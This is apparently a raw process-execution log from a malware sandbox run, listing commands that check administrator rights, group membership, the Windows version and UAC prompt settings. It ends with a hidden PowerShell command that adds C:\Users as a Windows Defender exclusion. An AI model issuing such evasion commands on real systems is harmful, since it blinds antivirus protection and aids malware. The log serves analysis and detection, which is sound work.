net1.exe C:\Windows\system32\net1 session
2632whoami.exe whoami /groups
2880findstr.exe findstr /i "\<S-1-5-32-544\>"
2860cmd.exe C:\Windows\system32\cmd.exe /c ver
2828cmd.exe C:\Windows\system32\cmd.exe /c REG QUERY "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
2148reg.exe REG QUERY "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
2228powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
2544